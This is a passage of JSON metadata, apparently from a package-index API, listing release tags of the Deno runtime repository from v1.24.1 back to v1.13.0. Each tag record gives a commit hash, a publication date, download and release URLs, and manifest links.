ttps://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":